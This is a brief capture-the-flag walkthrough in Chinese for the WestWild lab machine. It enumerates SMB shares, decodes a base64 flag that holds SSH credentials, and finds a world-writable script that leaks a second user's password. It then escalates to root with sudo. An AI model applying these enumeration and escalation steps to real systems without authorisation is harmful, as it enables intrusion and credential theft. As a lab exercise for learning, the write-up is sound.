WestWild

usershell

目标IP:192.168.205.148

服务探测:

22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

smbclient -L 192.168.205.148枚举smb信息

 print$          Disk      Printer Drivers
        wave            Disk      WaveDoor
        IPC$            IPC       IPC Service (WestWild server (Samba, Ubuntu))

smbclient //192.168.205.148/wave连接smb服务

发现两个txt文件

FLAG1.txt                           N       93  Mon Jul 29 22:31:05 2019
  message_from_aveng.txt              N      115  Tue Jul 30 01:21:48 2019

base64 -d FLAG1.txt

Flag1{Welcome_T0_THE-W3ST-W1LD-B0rder}
user:wavex
password:door+open

连接ssh，获得user权限

rootshell

find / -perm -ug=rw -type f 2>/dev/null

查找可读写文件，发现/usr/share/av/westsidesecret/ififoregt.sh

#!/bin/bash 
 figlet "if i foregt so this my way"
 echo "user:aveng"
 echo "password:kaizen+80"

获得aveng用户凭据

切换到aveng用户

sudo -l

(ALL : ALL) ALL

sudo su